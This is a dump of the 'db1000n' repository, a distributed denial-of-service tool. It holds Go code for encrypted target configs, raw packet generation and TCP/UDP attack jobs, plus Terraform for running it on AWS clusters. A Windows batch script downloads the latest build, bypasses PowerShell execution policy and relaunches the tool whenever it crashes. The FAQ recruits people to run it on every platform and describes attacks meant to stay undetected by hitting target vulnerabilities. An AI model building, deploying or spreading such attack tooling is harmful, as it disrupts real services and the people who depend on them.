[]byte(`age-encryption`)) 64 | } 65 | 66 | // Decrypt decrypts config using EncryptionKeys 67 | func Decrypt(cfg []byte) (result []byte, protected bool, err error) { 68 | decryptMutex.Lock() 69 | defer decryptMutex.Unlock() 70 | 71 | // iterate over all keys and return on first success decryption 72 | for _, key := range getEncryptionKeys() { 73 | result, err = decrypt(cfg, key.key) 74 | 75 | runtime.GC() // force GC to decrease memory usage 76 | 77 | if err != nil { 78 | continue 79 | } 80 | 81 | return result, key.protected, nil 82 | } 83 | 84 | return nil, false, err 85 | } 86 | 87 | func decrypt(cfg []byte, key string) ([]byte, error) { 88 | identity, err := age.NewScryptIdentity(key) 89 | if err != nil { 90 | return nil, err 91 | } 92 | 93 | decryptedReader, err := age.Decrypt(bytes.NewReader(cfg), identity) 94 | if err != nil { 95 | return nil, err 96 | } 97 | 98 | return io.ReadAll(decryptedReader) 99 | } 100 | -------------------------------------------------------------------------------- /src/utils/metrics/metrics.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 
14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | // Package metrics collects and reports job metrics. 24 | package metrics 25 | 26 | import ( 27 | "strings" 28 | "sync" 29 | ) 30 | 31 | type Metrics [NumStats]sync.Map // Array of metrics by Stat. Each metric is a map of uint64 values by dimensions. 32 | 33 | // NewAccumulator returns a new metrics Accumulator for the Reporter. 34 | func (m *Metrics) NewAccumulator(jobID string) *Accumulator { 35 | if m == nil { 36 | return nil 37 | } 38 | 39 | return newAccumulator(jobID, m) 40 | } 41 | 42 | // Calculates all targets and total stats 43 | func (m *Metrics) SumAllStats(groupTargets bool) (stats PerTargetStats, totals Stats) { 44 | stats = m.sumAllStatsByTarget(groupTargets) 45 | 46 | for s := RequestsAttemptedStat; s < NumStats; s++ { 47 | totals[s] = m.Sum(s) 48 | } 49 | 50 | return 51 | } 52 | 53 | // Sum returns a total sum of metric s. 54 | func (m *Metrics) Sum(s Stat) uint64 { 55 | var res uint64 56 | 57 | m[s].Range(func(_, v any) bool { 58 | value, ok := v.(uint64) 59 | if !ok { 60 | return true 61 | } 62 | 63 | res += value 64 | 65 | return true 66 | }) 67 | 68 | return res 69 | } 70 | 71 | // Returns a total sum of all metrics by target. 
72 | func (m *Metrics) sumAllStatsByTarget(groupTargets bool) PerTargetStats { 73 | res := make(PerTargetStats) 74 | 75 | for s := RequestsAttemptedStat; s < NumStats; s++ { 76 | m[s].Range(func(k, v any) bool { 77 | d, ok := k.(dimensions) 78 | if !ok { 79 | return true 80 | } 81 | 82 | value, ok := v.(uint64) 83 | if !ok { 84 | return true 85 | } 86 | 87 | var target string 88 | if groupTargets { 89 | protocol, _, found := strings.Cut(d.target, "://") 90 | if found { 91 | target = protocol 92 | } else { 93 | target = "other" 94 | } 95 | } else { 96 | target = d.target 97 | } 98 | 99 | stats := res[target] 100 | stats[s] += value 101 | res[target] = stats 102 | 103 | return true 104 | }) 105 | } 106 | 107 | return res 108 | } 109 | -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | # yaml-language-server: $schema=https://squidfunk.github.io/mkdocs-material/schema.json 2 | 3 | site_name: Death by 1000 needles 4 | 5 | site_url: https://arriven.github.io/db1000n 6 | 7 | repo_url: https://github.com/Arriven/db1000n 8 | 9 | repo_name: Arriven/db1000n 10 | 11 | copyright: Copyright © 2022 Arriven 12 | 13 | theme: 14 | name: material 15 | icon: 16 | repo: fontawesome/brands/github 17 | features: 18 | - search.suggest 19 | - search.highlight 20 | - search.share 21 | - navigation.tracking 22 | - navigation.expand 23 | - navigation.top 24 | palette: 25 | - media: "(prefers-color-scheme: light)" 26 | scheme: default 27 | primary: blue 28 | accent: red 29 | toggle: 30 | icon: material/lightbulb 31 | name: Switch to dark mode 32 | - media: "(prefers-color-scheme: dark)" 33 | scheme: slate 34 | primary: yellow 35 | accent: red 36 | toggle: 37 | icon: material/lightbulb-outline 38 | name: Switch to light mode 39 | 40 | markdown_extensions: 41 | - mdx_truly_sane_lists 42 | - pymdownx.emoji: 43 | emoji_index: !!python/name:materialx.emoji.twemoji 44 | 
emoji_generator: !!python/name:materialx.emoji.to_svg 45 | - pymdownx.critic 46 | - pymdownx.caret 47 | - pymdownx.mark 48 | - pymdownx.tilde 49 | - pymdownx.tabbed 50 | - attr_list 51 | - pymdownx.arithmatex: 52 | generic: true 53 | - pymdownx.highlight: 54 | linenums: false 55 | - pymdownx.superfences 56 | - pymdownx.inlinehilite 57 | - pymdownx.details 58 | - admonition 59 | - toc: 60 | baselevel: 2 61 | permalink: true 62 | slugify: !!python/name:pymdownx.slugs.uslugify 63 | - meta 64 | 65 | plugins: 66 | - include-markdown 67 | - git-tag 68 | - search: 69 | lang: 70 | - en 71 | - ru 72 | - i18n: 73 | default_language: en 74 | material_alternate: true 75 | languages: 76 | default: 77 | name: Default (en) 78 | build: true 79 | en: 80 | name: English 81 | build: true 82 | uk: 83 | name: Українська 84 | build: true 85 | nav_translations: 86 | en: 87 | Home: Quick start 88 | Index: Quick start 89 | Aws: AWS 90 | Gcp: GCP 91 | uk: 92 | Index: Швидкий старт 93 | Faq: Часті питання 94 | License: Ліцензія 95 | Aws: AWS 96 | Gcp: GCP 97 | 98 | extra: 99 | social: 100 | - icon: fontawesome/brands/github 101 | link: https://github.com/Arriven/db1000n 102 | name: GitHub repo 103 | - icon: fontawesome/brands/telegram 104 | link: https://t.me/ddos_separ 105 | name: Telegram group 106 | - icon: fontawesome/brands/instagram 107 | link: https://instagram.com/ddos_attack_separ 108 | name: Instagram 109 | - icon: fontawesome/brands/facebook 110 | link: https://www.facebook.com/ddos.attack.separ 111 | name: Facebook 112 | alternate: 113 | - name: default 114 | link: ./ 115 | lang: en 116 | - name: English 117 | link: ./en/ 118 | lang: en 119 | - name: Українська 120 | link: ./uk/ 121 | lang: uk 122 | -------------------------------------------------------------------------------- /src/core/packetgen/network.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko 
(https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 
22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | "github.com/google/gopacket/layers" 31 | 32 | "github.com/Arriven/db1000n/src/utils" 33 | ) 34 | 35 | func BuildNetworkLayer(c LayerConfig) (gopacket.NetworkLayer, error) { 36 | switch c.Type { 37 | case "": 38 | return nil, nil 39 | case "ipv4": 40 | var packetConfig IPPacketConfig 41 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 42 | return nil, err 43 | } 44 | 45 | return buildIPV4Packet(packetConfig), nil 46 | case "ipv6": 47 | var packetConfig IPPacketConfig 48 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 49 | return nil, err 50 | } 51 | 52 | return buildIPV6Packet(packetConfig), nil 53 | default: 54 | return nil, fmt.Errorf("unsupported network layer type %s", c.Type) 55 | } 56 | } 57 | 58 | // IPPacketConfig describes ip layer configuration 59 | type IPPacketConfig struct { 60 | SrcIP string 61 | DstIP string 62 | NextProtocol *int 63 | TTL uint8 64 | } 65 | 66 | // buildIPV4Packet generates a layers.IPv4 and returns it with source IP address and destination IP address 67 | func buildIPV4Packet(c IPPacketConfig) *layers.IPv4 { 68 | const ipv4 = 4 69 | 70 | next := layers.IPProtocolTCP 71 | if c.NextProtocol != nil { 72 | next = layers.IPProtocol(*c.NextProtocol) 73 | } 74 | 75 | return &layers.IPv4{ 76 | SrcIP: net.ParseIP(c.SrcIP).To4(), 77 | DstIP: net.ParseIP(c.DstIP).To4(), 78 | Version: ipv4, 79 | Protocol: next, 80 | TTL: c.TTL, 81 | } 82 | } 83 | 84 | // buildIPV6Packet generates a layers.IPv6 and returns it with source IP address and destination IP address 85 | func buildIPV6Packet(c IPPacketConfig) *layers.IPv6 { 86 | const ipv6 = 6 87 | 88 | next := layers.IPProtocolTCP 89 | if c.NextProtocol != nil { 90 | next = layers.IPProtocol(*c.NextProtocol) 91 | } 92 | 93 | return &layers.IPv6{ 94 | SrcIP: net.ParseIP(c.SrcIP).To16(), 95 | DstIP: net.ParseIP(c.DstIP).To16(), 96 | Version: ipv6, 97 | NextHeader: 
next, 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/job/rawnet.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 
22 | 23 | package job 24 | 25 | import ( 26 | "context" 27 | "fmt" 28 | "time" 29 | 30 | "go.uber.org/zap" 31 | 32 | "github.com/Arriven/db1000n/src/job/config" 33 | "github.com/Arriven/db1000n/src/utils/metrics" 34 | ) 35 | 36 | // "tcp" in config 37 | func tcpJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 38 | return rawnetJob(ctx, "tcp", args, globalConfig, a, logger) 39 | } 40 | 41 | // "udp" in config 42 | func udpJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 43 | return rawnetJob(ctx, "udp", args, globalConfig, a, logger) 44 | } 45 | 46 | func rawnetJob(ctx context.Context, protocol string, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) ( 47 | data any, err error, 48 | ) { 49 | packetgenArgs, err := parseRawNetJobArgs(globalConfig, args, protocol) 50 | if err != nil { 51 | return nil, err 52 | } 53 | 54 | return packetgenJob(ctx, packetgenArgs, globalConfig, a, logger) 55 | } 56 | 57 | func parseRawNetJobArgs(globalConfig *GlobalConfig, args config.Args, protocol string) ( 58 | result map[string]any, err error, 59 | ) { 60 | var jobConfig struct { 61 | BasicJobConfig 62 | 63 | Address string 64 | Body string 65 | ProxyURLs string 66 | Timeout *time.Duration 67 | } 68 | 69 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 70 | return nil, fmt.Errorf("error decoding rawnet job config: %w", err) 71 | } 72 | 73 | packetgenArgs := make(map[string]any) 74 | for k, v := range args { 75 | packetgenArgs[k] = v 76 | } 77 | 78 | packetgenArgs["connection"] = map[string]any{ 79 | "type": "net", 80 | "args": map[string]any{ 81 | "protocol": protocol, 82 | "address": jobConfig.Address, 83 | "timeout": jobConfig.Timeout, 84 | "proxy_urls": jobConfig.ProxyURLs, 85 | }, 86 | } 87 | packetgenArgs["packet"] = map[string]any{ 88 | 
"payload": map[string]any{ 89 | "type": "raw", 90 | "data": map[string]any{ 91 | "payload": jobConfig.Body, 92 | }, 93 | }, 94 | } 95 | 96 | return packetgenArgs, nil 97 | } 98 | -------------------------------------------------------------------------------- /src/utils/templates/encoding.go: -------------------------------------------------------------------------------- 1 | package templates 2 | 3 | import ( 4 | "encoding/json" 5 | "strings" 6 | 7 | "gopkg.in/yaml.v3" 8 | 9 | "github.com/Arriven/db1000n/src/utils" 10 | ) 11 | 12 | // toYAML takes an interface, marshals it to yaml, and returns a string. It will 13 | // always return a string, even on marshal error (empty string). 14 | // 15 | // This is designed to be called from a template. 16 | func toYAML(v any) string { 17 | data, err := yaml.Marshal(v) 18 | if err != nil { 19 | // Swallow errors inside of a template. 20 | return "" 21 | } 22 | 23 | return strings.TrimSuffix(string(data), "\n") 24 | } 25 | 26 | // fromYAML converts a YAML document into a map[string]any. 27 | // 28 | // This is not a general-purpose YAML parser, and will not parse all valid 29 | // YAML documents. Additionally, because its intended use is within templates 30 | // it tolerates errors. It will insert the returned error message string into 31 | // m["Error"] in the returned map. 32 | func fromYAML(str string) map[string]any { 33 | m := map[string]any{} 34 | if err := utils.Unmarshal([]byte(str), &m, "yaml"); err != nil { 35 | m["Error"] = err.Error() 36 | } 37 | 38 | return m 39 | } 40 | 41 | // fromYAMLArray converts a YAML array into a []any. 42 | // 43 | // This is not a general-purpose YAML parser, and will not parse all valid 44 | // YAML documents. Additionally, because its intended use is within templates 45 | // it tolerates errors. It will insert the returned error message string as 46 | // the first and only item in the returned array. 
47 | func fromYAMLArray(str string) []any { 48 | a := []any{} 49 | if err := utils.Unmarshal([]byte(str), &a, "yaml"); err != nil { 50 | a = []any{err.Error()} 51 | } 52 | 53 | return a 54 | } 55 | 56 | // toJSON takes an interface, marshals it to json, and returns a string. It will 57 | // always return a string, even on marshal error (empty string). 58 | // 59 | // This is designed to be called from a template. 60 | func toJSON(v any) string { 61 | data, err := json.Marshal(v) 62 | if err != nil { 63 | // Swallow errors inside of a template. 64 | return "" 65 | } 66 | 67 | return string(data) 68 | } 69 | 70 | // fromJSON converts a JSON document into a map[string]any. 71 | // 72 | // This is not a general-purpose JSON parser, and will not parse all valid 73 | // JSON documents. Additionally, because its intended use is within templates 74 | // it tolerates errors. It will insert the returned error message string into 75 | // m["Error"] in the returned map. 76 | func fromJSON(str string) map[string]any { 77 | m := make(map[string]any) 78 | if err := utils.Unmarshal([]byte(str), &m, "json"); err != nil { 79 | m["Error"] = err.Error() 80 | } 81 | 82 | return m 83 | } 84 | 85 | // fromJSONArray converts a JSON array into a []any. 86 | // 87 | // This is not a general-purpose JSON parser, and will not parse all valid 88 | // JSON documents. Additionally, because its intended use is within templates 89 | // it tolerates errors. It will insert the returned error message string as 90 | // the first and only item in the returned array. 
91 | func fromJSONArray(str string) []any { 92 | a := []any{} 93 | if err := utils.Unmarshal([]byte(str), &a, "json"); err != nil { 94 | a = []any{err.Error()} 95 | } 96 | 97 | return a 98 | } 99 | 100 | func fromStringArray(str string) []string { 101 | a := []string{} 102 | if err := utils.Unmarshal([]byte(str), &a, "yaml"); err != nil { 103 | a = []string{err.Error()} 104 | } 105 | 106 | return a 107 | } 108 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/main.tf: -------------------------------------------------------------------------------- 1 | # Create VPC 2 | resource "aws_vpc" "vpc" { 3 | cidr_block = var.vpc_cidr_block 4 | enable_dns_support = true 5 | enable_dns_hostnames = true 6 | 7 | 8 | tags = merge( 9 | { 10 | Name = "${var.name}" 11 | }, 12 | var.tags 13 | ) 14 | } 15 | 16 | # Create Internet gateway (associated with public subnets) 17 | resource "aws_internet_gateway" "internetgw" { 18 | vpc_id = aws_vpc.vpc.id 19 | 20 | 21 | tags = { 22 | Name = "${var.name}-internetgw" 23 | } 24 | } 25 | 26 | # Create elastic IPs (associated with NAT gateways) 27 | resource "aws_eip" "natgw" { 28 | count = var.amount_az 29 | vpc = true 30 | 31 | depends_on = [aws_internet_gateway.internetgw] 32 | } 33 | 34 | # Create NAT gateway (for each AZ) 35 | resource "aws_nat_gateway" "natgw" { 36 | count = var.amount_az 37 | allocation_id = aws_eip.natgw[count.index].id 38 | subnet_id = aws_subnet.public[count.index].id 39 | 40 | 41 | tags = { 42 | Name = "${var.name}-natgw-${data.aws_availability_zones.available.names[count.index]}" 43 | } 44 | 45 | depends_on = [aws_internet_gateway.internetgw] 46 | } 47 | 48 | # Create public subnets 49 | resource "aws_subnet" "public" { 50 | count = var.amount_az 51 | vpc_id = aws_vpc.vpc.id 52 | availability_zone = data.aws_availability_zones.available.names[count.index] 53 | cidr_block = cidrsubnet(var.vpc_cidr_block, 8, count.index + 1) 54 | 
map_public_ip_on_launch = true 55 | 56 | 57 | tags = merge( 58 | { 59 | "kubernetes.io/role/elb" = 1 60 | }, 61 | var.tags 62 | ) 63 | } 64 | 65 | # Create private subnets 66 | resource "aws_subnet" "private" { 67 | count = var.amount_az 68 | vpc_id = aws_vpc.vpc.id 69 | availability_zone = data.aws_availability_zones.available.names[count.index] 70 | cidr_block = cidrsubnet(var.vpc_cidr_block, 8, count.index + 3) 71 | 72 | 73 | tags = merge( 74 | { 75 | "kubernetes.io/role/internal-elb" = 1 76 | }, 77 | var.tags 78 | ) 79 | } 80 | 81 | # Create Internet gateway route table 82 | resource "aws_route_table" "internetgw" { 83 | vpc_id = aws_vpc.vpc.id 84 | 85 | route { 86 | cidr_block = "0.0.0.0/0" 87 | gateway_id = aws_internet_gateway.internetgw.id 88 | } 89 | 90 | 91 | tags = { 92 | Name = "${var.name}-internetgw" 93 | } 94 | } 95 | 96 | # Create NAT gateway route table (one for each a-z) 97 | resource "aws_route_table" "natgw" { 98 | count = var.amount_az 99 | vpc_id = aws_vpc.vpc.id 100 | 101 | route { 102 | cidr_block = "0.0.0.0/0" 103 | nat_gateway_id = aws_nat_gateway.natgw[count.index].id 104 | } 105 | 106 | 107 | tags = { 108 | Name = "${var.name}-natgw-${data.aws_availability_zones.available.names[count.index]}" 109 | } 110 | } 111 | 112 | # Create Internet gateway route table association (associated with public subnets) 113 | resource "aws_route_table_association" "internetgw" { 114 | count = var.amount_az 115 | subnet_id = aws_subnet.public[count.index].id 116 | route_table_id = aws_route_table.internetgw.id 117 | } 118 | 119 | # Create NAT gateway route table association (associated with private subnets) 120 | resource "aws_route_table_association" "natgw" { 121 | count = var.amount_az 122 | subnet_id = aws_subnet.private[count.index].id 123 | route_table_id = aws_route_table.natgw[count.index].id 124 | } -------------------------------------------------------------------------------- /scripts/StartDB1000N.bat: 
-------------------------------------------------------------------------------- 1 | rem First we write PowerShell script to separate file, since it's easier to do download from github with powershell 2 | rem Parsing command line argument to get target download folder 3 | echo $SaveFolder = $args[0] > %temp%\GetDB1000N.ps1 4 | echo if ($args.count -lt 1) >> %temp%\GetDB1000N.ps1 5 | echo { >> %temp%\GetDB1000N.ps1 6 | echo Write-Host "Missing save folder parameter" >> %temp%\GetDB1000N.ps1 7 | echo } >> %temp%\GetDB1000N.ps1 8 | rem Create target folder if it don't exist yet 9 | echo New-Item -ItemType Directory -Force -Path $SaveFolder >> %temp%\GetDB1000N.ps1 10 | rem Getting list of files in latest release via github API and parse response JSON 11 | echo $JSONURL = "https://api.github.com/repos/Arriven/db1000n/releases/latest" >> %temp%\GetDB1000N.ps1 12 | echo $JSON = Invoke-WebRequest -Uri $JSONURL -UseBasicParsing >> %temp%\GetDB1000N.ps1 13 | echo $ParsedJSON = ConvertFrom-Json -InputObject $JSON >> %temp%\GetDB1000N.ps1 14 | echo $Assets = Select-Object -InputObject $ParsedJSON -ExpandProperty assets >> %temp%\GetDB1000N.ps1 15 | rem Iterate over list of all files in release 16 | echo Foreach ($Asset IN $Assets) >> %temp%\GetDB1000N.ps1 17 | echo { >> %temp%\GetDB1000N.ps1 18 | rem Search for windows x64 build with regex 19 | echo if ($Asset.name -match 'db1000n_windows_amd64.zip') >> %temp%\GetDB1000N.ps1 20 | echo { >> %temp%\GetDB1000N.ps1 21 | rem Download found build 22 | echo $DownloadURL = $Asset.browser_download_url >> %temp%\GetDB1000N.ps1 23 | echo $ZIPPath = Join-Path -Path $SaveFolder -ChildPath "db1000n.zip" >> %temp%\GetDB1000N.ps1 24 | echo Invoke-WebRequest -Uri $DownloadURL -OutFile $ZIPPath >> %temp%\GetDB1000N.ps1 25 | rem Extract downloaded archive 26 | echo Expand-Archive -Path $ZIPPath -DestinationPath $SaveFolder -Force >> %temp%\GetDB1000N.ps1 27 | rem Delete original archive file 28 | echo Remove-Item -Path $ZIPPath >> 
%temp%\GetDB1000N.ps1 29 | echo Write-Host "Sucessfully downloaded DB1000N $($Asset.name)" >> %temp%\GetDB1000N.ps1 30 | echo exit 0 >> %temp%\GetDB1000N.ps1 31 | echo } >> %temp%\GetDB1000N.ps1 32 | echo } >> %temp%\GetDB1000N.ps1 33 | echo Write-Host "Something went wrong, couldn't download DB1000N" >> %temp%\GetDB1000N.ps1 34 | echo exit 1 >> %temp%\GetDB1000N.ps1 35 | 36 | rem Download latest windows x64 build 37 | rem We don't currently check if it's already downloaded, so it redownload latest version each run 38 | powershell -ExecutionPolicy Bypass -File %temp%\GetDB1000N.ps1 %temp% 39 | rem Assume that archive contained executable file named db1000n.exe and try to run it 40 | :StartApp 41 | rem Starts the app and if it returns 0 exit code it does "goto End", breaking loop 42 | %temp%/db1000n.exe && goto End 43 | rem Otherwise, if exit code is non zero, report and restart 44 | echo DB1000N crahed with exit code %errorlevel%, restarting 45 | goto StartApp 46 | :End 47 | exit /b 0 48 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/main.tf: -------------------------------------------------------------------------------- 1 | # Create EKS cluster role 2 | resource "aws_iam_role" "eks_cluster" { 3 | name = "AWSEKSClusterRole" 4 | # name = "AmazonEKSClusterRole" 5 | assume_role_policy = data.aws_iam_policy_document.eks_cluster_assume_role_policy.json 6 | 7 | tags = { 8 | Cluster = var.cluster_name 9 | } 10 | 11 | lifecycle { 12 | ignore_changes = [name, name_prefix] 13 | } 14 | } 15 | 16 | # Create EKS cluster role policy attachment 17 | resource "aws_iam_role_policy_attachment" "eks_cluster_AmazonEKSClusterPolicy" { 18 | policy_arn = "arn:aws:iam::aws:policy/AmazonEKSClusterPolicy" 19 | role = aws_iam_role.eks_cluster.name 20 | } 21 | 22 | resource "aws_iam_role_policy_attachment" "eks_cluster_AmazonEKSServicePolicy" { 23 | policy_arn = "arn:aws:iam::aws:policy/AmazonEKSServicePolicy" 24 | 
role = aws_iam_role.eks_cluster.name 25 | } 26 | 27 | # Create EKS cluster autoscaler role 28 | resource "aws_iam_role" "eks_cluster_autoscaler" { 29 | name = "AmazonEKSClusterAutoscalerRole" 30 | assume_role_policy = data.aws_iam_policy_document.assume_role_policy_web_identity.json 31 | 32 | inline_policy { 33 | name = "AmazonEKSClusterAutoscalerPolicy" 34 | policy = data.aws_iam_policy_document.eks_cluster_autoscaler_policy.json 35 | } 36 | 37 | tags = { 38 | Cluster = var.cluster_name 39 | } 40 | 41 | lifecycle { 42 | ignore_changes = [name, name_prefix] 43 | } 44 | 45 | depends_on = [aws_iam_openid_connect_provider.oidc_provider] 46 | } 47 | 48 | # Create EKS cluster 49 | resource "aws_eks_cluster" "eks_cluster" { 50 | name = var.cluster_name 51 | version = var.cluster_version 52 | role_arn = aws_iam_role.eks_cluster.arn 53 | enabled_cluster_log_types = ["api", "audit", "authenticator", "controllerManager", "scheduler"] 54 | 55 | vpc_config { 56 | security_group_ids = [aws_security_group.control_plane.id] 57 | subnet_ids = var.subnets 58 | } 59 | 60 | depends_on = [ 61 | aws_iam_role_policy_attachment.eks_cluster_AmazonEKSClusterPolicy, 62 | aws_iam_role_policy_attachment.eks_cluster_AmazonEKSServicePolicy 63 | ] 64 | } 65 | 66 | # create OIDC provider 67 | resource "aws_iam_openid_connect_provider" "oidc_provider" { 68 | client_id_list = ["sts.amazonaws.com"] 69 | thumbprint_list = [data.tls_certificate.cert.certificates[0].sha1_fingerprint] 70 | url = aws_eks_cluster.eks_cluster.identity[0].oidc[0].issuer 71 | } 72 | 73 | # Create EKS cluster security group 74 | resource "aws_security_group" "control_plane" { 75 | name = "${var.cluster_name}-control-plane" 76 | description = "Cluster communication with worker nodes" 77 | vpc_id = var.vpc_id 78 | 79 | egress { 80 | from_port = 0 81 | to_port = 0 82 | protocol = "-1" 83 | cidr_blocks = ["0.0.0.0/0"] 84 | } 85 | 86 | revoke_rules_on_delete = true 87 | 88 | lifecycle { 89 | create_before_destroy = true 90 | } 91 
| 92 | tags = { 93 | Name = "${var.cluster_name}-control-plane" 94 | Cluster = var.cluster_name 95 | } 96 | } 97 | 98 | # Create EKS cluster security group rules 99 | resource "aws_security_group_rule" "control_plane_ingress_nodes" { 100 | description = "Allow cluster control plane to receive communication from the worker Kubelets" 101 | type = "ingress" 102 | from_port = 443 103 | to_port = 443 104 | protocol = "tcp" 105 | security_group_id = aws_security_group.control_plane.id 106 | source_security_group_id = var.source_security_groups 107 | } -------------------------------------------------------------------------------- /docs/faq.md: -------------------------------------------------------------------------------- 1 | # FAQ 2 | 3 | ???+ faq "Where can I find advanced documentation?" 4 | 5 | [Here](/db1000n/advanced-docs/advanced-and-devs/) 6 | 7 | --- 8 | 9 | ???+ faq "I installed `db1000n` but it's not working properly. What to do?" 10 | 11 | Create [Issue](https://github.com/Arriven/db1000n/issues) and community will help you with solving a problem 12 | 13 | --- 14 | 15 | ???+ faq "I'm **not** a developer, how can I help to project?" 16 | 17 | - Share information about `db1000n` in social media, with your friends and colleagues 18 | - Run `db1000n` on every possible platform (local machine, public clouds, Docker, Kubernetes, etc) 19 | - Create [Issues](https://github.com/Arriven/db1000n/issues) or 20 | [Pull Requests](https://github.com/Arriven/db1000n/pulls) 21 | if you found any bugs, missed documentation, misspells, etc 22 | 23 | --- 24 | 25 | ???+ faq "I'm a developer, how can I help to project?" 26 | 27 | - Check [Issues](https://github.com/Arriven/db1000n/issues) to help with important tasks 28 | - Check our codebase and make [PRs](https://github.com/Arriven/db1000n/pulls) 29 | - Test an app on different platforms and report bugs or feature requests 30 | 31 | --- 32 | 33 | ???+ faq "When I run `db1000n` I see that it generates low amount of traffic. 
Isn't that bad?" 34 | 35 | ???+ info "it's okay" 36 | 37 | The app is configurable to generate set amount of traffic (controlled by the number 38 | of targets, their type, and attack interval for each of them). 39 | The main reason it works that way is because there are two main types of ddos: 40 | 41 | - Straightforward load generation (easy to implement, easy to defend from) - as effective 42 | as the amount of raw traffic you can generate 43 | 44 | - Actual denial of service that aims to remain as undetected as possible by simulating plausible 45 | traffic and hitting concrete vulnerabilities in the target (or targets). This type of ddos doesn't 46 | require a lot of traffic and thus is mostly limited by the amount of clients generating this type 47 | of load (or rather unique IPs) 48 | 49 | --- 50 | 51 | ???+ faq "Should I care about costs if I run an app in public cloud?" 52 | 53 | ???+ info "[Yes](https://github.com/Arriven/db1000n/issues/153)" 54 | 55 | Cloud providers could charge a huge amount of money not only for compute resources but for traffic as well. 56 | If you run an app in the cloud please control your billing 57 | 58 | --- 59 | 60 | ???+ faq "Can I leave the site for the night?" 61 | 62 | Yes, you can. I personally leave the browser on overnight and it works fine. 63 | 64 | --- 65 | 66 | ???+ faq "How can I make sure that the computer does not go to sleep while the site is running?" 67 | 68 | To do this, you need to install a program which keeps the screen turned off. Instructions for different operating systems below: 69 | 70 | - I have Windows: Caffeinated ([download](https://www.microsoft.com/en-us/p/windows-caffeinated/9pbvhhsn78bl?activetab=pivot:overviewtab)) 71 | - I have Mac OS: Amphetamine ([download](https://apps.apple.com/us/app/amphetamine/id937984704?mt=12)) 72 | 73 | --- 74 | 75 | ???+ faq "What are primitive jobs?" 76 | 77 | Primitive jobs rely on generating as much raw traffic as possible. This might exhaust your system. 
They are also easier to detect and inadvisable to be used in the cloud environment.

---

???+ faq "The app shows low response rate, is it ok?"

